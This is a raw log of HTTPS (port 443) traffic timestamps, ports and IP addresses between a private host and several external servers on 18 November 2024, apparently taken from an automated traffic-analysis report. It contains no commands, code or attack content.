                                                                                                                                                                                            Nov 18, 2024 21:00:08.916162968 CET49797443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.916261911 CET4434979766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.916393042 CET49797443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.916527033 CET49798443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.916560888 CET4434979866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.916613102 CET49798443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.916901112 CET49797443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.916927099 CET4434979766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.917038918 CET49798443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.917051077 CET4434979866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.922368050 CET49771443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:08.937781096 CET49801443192.168.2.16173.194.76.157
                                                                                                                                                                                            Nov 18, 2024 21:00:08.937792063 CET44349801173.194.76.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.937859058 CET49801443192.168.2.16173.194.76.157
                                                                                                                                                                                            Nov 18, 2024 21:00:08.938031912 CET49801443192.168.2.16173.194.76.157
                                                                                                                                                                                            Nov 18, 2024 21:00:08.938043118 CET44349801173.194.76.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.938369036 CET49769443192.168.2.16146.75.120.157
                                                                                                                                                                                            Nov 18, 2024 21:00:08.938375950 CET49770443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:08.959033012 CET4434977766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.959041119 CET4434977766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.959060907 CET4434977766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.959115982 CET49777443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.959176064 CET49777443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.959897041 CET4434977766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.959903955 CET4434977766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.959990025 CET49777443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.961823940 CET4434977766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.961829901 CET4434977766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.961900949 CET49777443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.971528053 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.971539021 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.971581936 CET49770443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:08.971592903 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.971623898 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.971649885 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.971657991 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.971667051 CET49770443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:08.971667051 CET49770443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:08.971667051 CET49770443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:08.971687078 CET49770443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:08.971702099 CET49770443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:08.992568970 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.992588997 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.992654085 CET49770443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:08.992660046 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.992770910 CET49770443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:08.996203899 CET44349771157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.996212959 CET44349771157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.996257067 CET44349771157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.996258974 CET49771443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:08.996265888 CET44349771157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.996285915 CET49771443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:08.996296883 CET44349771157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.996309042 CET44349771157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.996320963 CET49771443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:08.996354103 CET49771443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:08.998197079 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.998256922 CET49770443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.003076077 CET44349769146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.003226042 CET44349769146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.003283978 CET49769443192.168.2.16146.75.120.157
                                                                                                                                                                                            Nov 18, 2024 21:00:09.003300905 CET44349769146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.003864050 CET44349769146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.003941059 CET44349769146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.003943920 CET49769443192.168.2.16146.75.120.157
                                                                                                                                                                                            Nov 18, 2024 21:00:09.003966093 CET44349769146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.004046917 CET49769443192.168.2.16146.75.120.157
                                                                                                                                                                                            Nov 18, 2024 21:00:09.004115105 CET44349769146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.004262924 CET44349769146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.004321098 CET49769443192.168.2.16146.75.120.157
                                                                                                                                                                                            Nov 18, 2024 21:00:09.004334927 CET44349769146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.004419088 CET44349769146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.004470110 CET49769443192.168.2.16146.75.120.157
                                                                                                                                                                                            Nov 18, 2024 21:00:09.004482985 CET44349769146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.004549026 CET44349769146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.004771948 CET49769443192.168.2.16146.75.120.157
                                                                                                                                                                                            Nov 18, 2024 21:00:09.004785061 CET44349769146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.005311966 CET44349769146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.005383968 CET49769443192.168.2.16146.75.120.157
                                                                                                                                                                                            Nov 18, 2024 21:00:09.005542994 CET49769443192.168.2.16146.75.120.157
                                                                                                                                                                                            Nov 18, 2024 21:00:09.005573034 CET44349769146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.014209986 CET4434977566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.014311075 CET49775443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.024148941 CET49802443192.168.2.16146.75.120.157
                                                                                                                                                                                            Nov 18, 2024 21:00:09.024207115 CET44349802146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.024300098 CET49802443192.168.2.16146.75.120.157
                                                                                                                                                                                            Nov 18, 2024 21:00:09.024564028 CET49802443192.168.2.16146.75.120.157
                                                                                                                                                                                            Nov 18, 2024 21:00:09.024593115 CET44349802146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.026397943 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.026454926 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.026470900 CET49770443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.026490927 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.026607990 CET49770443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.030004978 CET4434977566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.030087948 CET49775443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.030400991 CET4434977566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.030479908 CET49775443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.030999899 CET4434977566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.031100035 CET49775443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.031888008 CET4434977566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.031969070 CET49775443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.032793999 CET4434977566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.032859087 CET49775443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.033680916 CET4434977566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.033750057 CET49775443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.041968107 CET44349771157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.041977882 CET44349771157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.042030096 CET44349771157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.042053938 CET49771443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.042081118 CET44349771157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.042095900 CET49771443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.046112061 CET44349771157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.046166897 CET49771443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.046175003 CET44349771157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.055565119 CET49803443192.168.2.16162.159.140.229
                                                                                                                                                                                            Nov 18, 2024 21:00:09.055592060 CET44349803162.159.140.229192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.055659056 CET49803443192.168.2.16162.159.140.229
                                                                                                                                                                                            Nov 18, 2024 21:00:09.055841923 CET49803443192.168.2.16162.159.140.229
                                                                                                                                                                                            Nov 18, 2024 21:00:09.055856943 CET44349803162.159.140.229192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.061589956 CET4434977766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.061599970 CET4434977766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.061667919 CET49777443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.077678919 CET4434977766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.077687025 CET4434977766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.077756882 CET49777443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.078176022 CET4434977766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.078183889 CET4434977766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.078241110 CET49777443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.078758955 CET4434977766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.078840971 CET49777443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.079566956 CET4434977766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.079647064 CET49777443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.081288099 CET4434977766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.081382990 CET49777443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.082173109 CET4434977766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.082242012 CET49777443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.083123922 CET4434977766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.083204031 CET49777443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.090291977 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.090306997 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.090399027 CET49770443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.090409994 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.090456009 CET49770443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.092907906 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.092921972 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.093377113 CET49770443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.093383074 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.093434095 CET49770443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.096359015 CET49771443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.103471994 CET4434977966.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.103725910 CET49779443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.103749037 CET4434977966.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.104033947 CET4434977966.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.104338884 CET49779443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.104398966 CET4434977966.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.104481936 CET49779443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.108740091 CET4434977866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.109095097 CET49778443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.109128952 CET4434977866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.109379053 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.109428883 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.109436035 CET49770443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.109452963 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.109484911 CET49770443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.110389948 CET4434977866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.110801935 CET49778443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.110963106 CET49778443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.110975981 CET4434977866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.110999107 CET4434977866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.112158060 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.112219095 CET49770443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.116209984 CET44349771157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.116221905 CET44349771157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.116264105 CET44349771157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.116272926 CET49771443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.116281986 CET44349771157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.116314888 CET49771443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.116357088 CET44349771157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.116410017 CET49771443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.116419077 CET44349771157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.126786947 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.126833916 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.126852989 CET49770443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.126858950 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.126888037 CET49770443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.126900911 CET49770443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.128206015 CET4434978166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.128532887 CET49781443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.128540993 CET4434978166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.130913973 CET4434977566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.130994081 CET49775443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.131479979 CET4434977566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.131544113 CET49775443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.132100105 CET4434978166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.132179976 CET49781443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.132311106 CET4434977566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.132389069 CET49775443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.132599115 CET49781443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.132771969 CET4434978166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.132915020 CET49781443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.132921934 CET4434978166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.135638952 CET44349771157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.135659933 CET44349771157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.135755062 CET49771443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.135766029 CET44349771157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.135857105 CET49771443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.141103983 CET44349771157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.141168118 CET49771443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.142164946 CET4434978066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.142350912 CET49780443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.142359972 CET4434978066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.142534971 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.142550945 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.142611027 CET49770443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.142616987 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.142653942 CET49770443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.143646002 CET4434978066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.143712044 CET49780443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.143970013 CET49780443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.144026041 CET4434978066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.144212961 CET49780443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.144220114 CET4434978066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.146678925 CET44349771157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.146734953 CET49771443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.146925926 CET4434977566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.146990061 CET49775443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.147329092 CET4434977966.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.147465944 CET4434977566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.147537947 CET49775443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.148097038 CET4434977566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.148181915 CET49775443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.148186922 CET4434977566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.148267031 CET4434977566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.148317099 CET49775443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.148395061 CET49775443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.148408890 CET4434977566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.148705959 CET49804443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.148726940 CET4434980466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.148813009 CET49804443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.149219036 CET49804443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.149226904 CET4434980466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.151843071 CET44349771157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.151896954 CET49771443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.153337002 CET44349785151.101.193.140192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.153583050 CET49785443192.168.2.16151.101.193.140
                                                                                                                                                                                            Nov 18, 2024 21:00:09.153593063 CET44349785151.101.193.140192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.154264927 CET44349786151.101.1.140192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.154556036 CET49786443192.168.2.16151.101.1.140
                                                                                                                                                                                            Nov 18, 2024 21:00:09.154572010 CET44349786151.101.1.140192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.155009985 CET44349785151.101.193.140192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.155076981 CET49785443192.168.2.16151.101.193.140
                                                                                                                                                                                            Nov 18, 2024 21:00:09.155451059 CET49785443192.168.2.16151.101.193.140
                                                                                                                                                                                            Nov 18, 2024 21:00:09.155620098 CET49785443192.168.2.16151.101.193.140
                                                                                                                                                                                            Nov 18, 2024 21:00:09.155625105 CET44349785151.101.193.140192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.155683994 CET44349785151.101.193.140192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.156147957 CET44349786151.101.1.140192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.156208992 CET49786443192.168.2.16151.101.1.140
                                                                                                                                                                                            Nov 18, 2024 21:00:09.156855106 CET49786443192.168.2.16151.101.1.140
                                                                                                                                                                                            Nov 18, 2024 21:00:09.156944036 CET44349786151.101.1.140192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.157679081 CET49786443192.168.2.16151.101.1.140
                                                                                                                                                                                            Nov 18, 2024 21:00:09.157685995 CET44349786151.101.1.140192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.158000946 CET44349771157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.158046007 CET49771443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.158067942 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.158082008 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.158123016 CET49770443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.158128977 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.158149004 CET49770443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.158181906 CET49770443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.160598040 CET49778443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:09.162914991 CET44349771157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.162959099 CET49771443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.168515921 CET44349771157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.168574095 CET49771443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.168735027 CET49771443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.168775082 CET44349771157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.168828964 CET49771443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.173058033 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.173075914 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.173135042 CET49770443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.173141956 CET44349770157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.173218966 CET49770443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.174245119 CET49805443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.174288988 CET44349805157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.174551010 CET49805443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.174799919 CET49805443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:09.174827099 CET44349805157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:09.175481081 CET4434978366.33.207.42192.168.2.16
